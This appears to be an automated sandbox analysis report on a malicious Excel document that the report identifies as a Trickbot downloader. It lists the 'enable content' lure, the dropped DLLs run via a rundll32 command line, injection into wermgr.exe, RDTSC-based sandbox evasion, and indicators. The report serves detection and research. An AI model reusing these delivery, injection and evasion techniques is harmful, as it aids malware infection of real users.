                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                Source: Screenshot number: 8Screenshot OCR: Enable editing button from the yellow bar above 15 16 Once you have enabled editing, please click
                Source: Screenshot number: 8Screenshot OCR: Enable content button ,. . , 17 from the yellow bar above :: ' 20 . 21 22 23 24 25 26 2
                Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
                Source: Document image extraction number: 0Screenshot OCR: Enable content button from the yellow bar above
                Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
                Source: Document image extraction number: 1Screenshot OCR: Enable content button from the yellow bar above 1/'
                Found Excel 4.0 Macro with suspicious formulasShow sources
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsInitial sample: EXEC
                Office process drops PE fileShow sources
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\8[1].jjkesJump to dropped file
                Source: C:\Windows\System32\wermgr.exeProcess Stats: CPU usage > 98%
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C243C0 NtQuerySystemInformation,DuplicateHandle,RtlDeleteBoundaryDescriptor,
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C2B470 NtDelayExecution,
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142BB0040
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C32060
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C243C0
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C2BCA0
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C27840
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C18010
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C263A8
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C217B0
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C25F70
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C1E0F0
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C214F0
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C26100
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C11500
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C26D10
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C144C0
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C290E0
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C30870
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C28CA0
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C27630
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C2CA00
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C19200
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C2BE20
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C289B0
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C22580
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C23B00
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C2B700
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C1E310
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C12720
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C1CEB0
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C2CE70
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C1A280
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C11290
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C1C290
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsOLE indicator, VBA macros: true
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\8[1].jjkes AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                Source: Joe Sandbox ViewDropped File: C:\Users\user\BASE.BABAA AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@7/8@1/1
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C14C40 LookupPrivilegeValueW,AdjustTokenPrivileges,FindCloseChangeNotification,
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
                Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{0DDB1B33-74F5-8CBE-2F10-2ABF9CE5DA77}
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{DB1734B8-B67B-4A31-BD29-86C7EF803FEF} - OProcSessId.datJump to behavior
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsOLE indicator, Workbook stream: true
                Source: C:\Windows\System32\wermgr.exeSystem information queried: HandleInformation
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsVirustotal: Detection: 11%
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsReversingLabs: Detection: 23%
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: unknownProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: unknownProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
                Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb source: rundll32.exe, 0000000E.00000002.309993835.0000000067C19000.00000002.00020000.sdmp, BASE.BABAA.0.dr
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04A01BD0 push dword ptr [edx+14h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04A01C7A push dword ptr [edx+14h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04A01CFD push dword ptr [edx+14h]; ret
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C2D0F0 push 8B48D233h; iretd
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\8[1].jjkesJump to dropped file
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\8[1].jjkesJump to dropped file
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file

                Boot Survival:

                barindex
                Drops PE files to the user root directoryShow sources
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion:

                barindex
                Found evasive API chain (trying to detect sleep duration tampering with parallel thread)Show sources
                Source: C:\Windows\System32\wermgr.exeFunction Chain: threadCreated,threadDelayed,threadDelayed,userTimerSet,threadDelayed,threadDelayed,fileVolumeQueried,languageOrLocalQueried,languageOrLocalQueried,adjustToken,systemQueried,systemQueried,threadDelayed,threadDelayed,mutantCreated,threadInformationSet,threadInformationSet,threadInformationSet,threadInformationSet,threadDelayed,threadDelayed,threadDelayed,threadDelayed
                Tries to detect virtualization through RDTSC time measurementsShow sources
                Source: C:\Windows\System32\wermgr.exeRDTSC instruction interceptor: First address: 0000018142C1EAD0 second address: 0000018142C1EAD0 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 ret 0x0000000a dec esp 0x0000000b mov edi, eax 0x0000000d call dword ptr [0000E3AEh] 0x00000013 mov ecx, 7FFE0320h 0x00000018 dec eax 0x00000019 mov ecx, dword ptr [ecx] 0x0000001b mov eax, dword ptr [7FFE0004h] 0x00000022 dec eax 0x00000023 imul eax, ecx 0x00000026 dec eax 0x00000027 shr eax, 18h 0x0000002a ret 0x0000002b inc esp 0x0000002c mov esi, eax 0x0000002e dec ecx 0x0000002f mov esi, edi 0x00000031 dec eax 0x00000032 xor esi, FFFFFF00h 0x00000038 dec ecx 0x00000039 and esi, edi 0x0000003b call 00007FD4ECC9DC86h 0x00000040 rdtsc
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C1EAD0 rdtsc
                Source: C:\Windows\System32\wermgr.exeCode function: GetAdaptersInfo,RtlDeleteBoundaryDescriptor,
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\8[1].jjkesJump to dropped file
                Source: C:\Windows\System32\wermgr.exeLast function: Thread delayed
                Source: wermgr.exe, 00000010.00000002.569764866.0000018142C81000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C1EAD0 rdtsc
                Source: C:\Windows\System32\wermgr.exeCode function: 16_2_0000018142C23070 LdrLoadDll,

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Allocates memory in foreign processesShow sources
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\wermgr.exe base: 18142C10000 protect: page execute and read and write
                Writes to foreign memory regionsShow sources
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\wermgr.exe base: 18142C10000
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\wermgr.exe base: 7FF7CA4F2860
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: wermgr.exe, 00000010.00000002.570684815.0000018143480000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: wermgr.exe, 00000010.00000002.570684815.0000018143480000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: wermgr.exe, 00000010.00000002.570684815.0000018143480000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: wermgr.exe, 00000010.00000002.570684815.0000018143480000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: C:\Windows\System32\wermgr.exeQueries volume information: C:\ VolumeInformation

                Stealing of Sensitive Information:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: 0000000E.00000003.304386542.0000000000E7F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.308987556.0000000004840000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.304304596.0000000004935000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.309036588.00000000048D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.304224445.0000000000E07000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.304290876.0000000000E7F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.304101028.00000000048D1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 14.2.rundll32.exe.4840000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.rundll32.exe.4840000.2.unpack, type: UNPACKEDPE

                Remote Access Functionality:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: 0000000E.00000003.304386542.0000000000E7F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.308987556.0000000004840000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.304304596.0000000004935000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.309036588.00000000048D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.304224445.0000000000E07000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.304290876.0000000000E7F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.304101028.00000000048D1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 14.2.rundll32.exe.4840000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.rundll32.exe.4840000.2.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsScripting21Path InterceptionAccess Token Manipulation1Masquerading121OS Credential DumpingSecurity Software Discovery111Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection212Disable or Modify Tools2LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsExploitation for Client Execution33Logon Script (Windows)Extra Window Memory Injection1Access Token Manipulation1Security Account ManagerSystem Network Configuration Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection212NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsSystem Information Discovery113SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobExtra Window Memory Injection1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls11%VirustotalBrowse
                SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls23%ReversingLabsDocument-Word.Downloader.EncDoc

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\8[1].jjkes6%ReversingLabsWin32.Trojan.Trickpak
                C:\Users\user\BASE.BABAA6%ReversingLabsWin32.Trojan.Trickpak

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                14.2.rundll32.exe.4840000.2.unpack100%AviraHEUR/AGEN.1138157Download File

                Domains

                SourceDetectionScannerLabelLink
                chipmania.it1%VirustotalBrowse
                www.chipmania.it2%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                https://cdn.entity.0%URL Reputationsafe
                https://cdn.entity.0%URL Reputationsafe
                https://cdn.entity.0%URL Reputationsafe
                https://cdn.entity.0%URL Reputationsafe
                https://wus2-000.contentsync.0%URL Reputationsafe
                https://wus2-000.contentsync.0%URL Reputationsafe
                https://wus2-000.contentsync.0%URL Reputationsafe
                https://wus2-000.contentsync.0%URL Reputationsafe
                https://powerlift.acompli.net0%URL Reputationsafe
                https://powerlift.acompli.net0%URL Reputationsafe
                https://powerlift.acompli.net0%URL Reputationsafe
                https://powerlift.acompli.net0%URL Reputationsafe
                https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                https://cortana.ai0%URL Reputationsafe
                https://cortana.ai0%URL Reputationsafe
                https://cortana.ai0%URL Reputationsafe
                https://cortana.ai0%URL Reputationsafe
                https://api.aadrm.com/0%URL Reputationsafe
                https://api.aadrm.com/0%URL Reputationsafe
                https://api.aadrm.com/0%URL Reputationsafe
                https://api.aadrm.com/0%URL Reputationsafe
                https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
                https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
                https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
                https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
                https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
                https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
                https://officeci.azurewebsites.net/api/0%VirustotalBrowse
                https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
                https://store.office.cn/addinstemplate0%URL Reputationsafe
                https://store.office.cn/addinstemplate0%URL Reputationsafe
                https://store.office.cn/addinstemplate0%URL Reputationsafe
                https://store.office.cn/addinstemplate0%URL Reputationsafe
                https://wus2-000.pagecontentsync.0%URL Reputationsafe
                https://wus2-000.pagecontentsync.0%URL Reputationsafe
                https://wus2-000.pagecontentsync.0%URL Reputationsafe
                https://wus2-000.pagecontentsync.0%URL Reputationsafe
                https://store.officeppe.com/addinstemplate0%URL Reputationsafe
                https://store.officeppe.com/addinstemplate0%URL Reputationsafe
                https://store.officeppe.com/addinstemplate0%URL Reputationsafe
                https://store.officeppe.com/addinstemplate0%URL Reputationsafe
                https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
                https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
                https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
                https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
                https://www.odwebp.svc.ms0%URL Reputationsafe
                https://www.odwebp.svc.ms0%URL Reputationsafe
                https://www.odwebp.svc.ms0%URL Reputationsafe
                https://www.odwebp.svc.ms0%URL Reputationsafe
                https://dataservice.o365filtering.com/0%URL Reputationsafe
                https://dataservice.o365filtering.com/0%URL Reputationsafe
                https://dataservice.o365filtering.com/0%URL Reputationsafe
                https://dataservice.o365filtering.com/0%URL Reputationsafe
                https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
                https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
                https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
                https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
                https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
                https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
                https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
                https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
                https://apis.live.net/v5.0/0%URL Reputationsafe
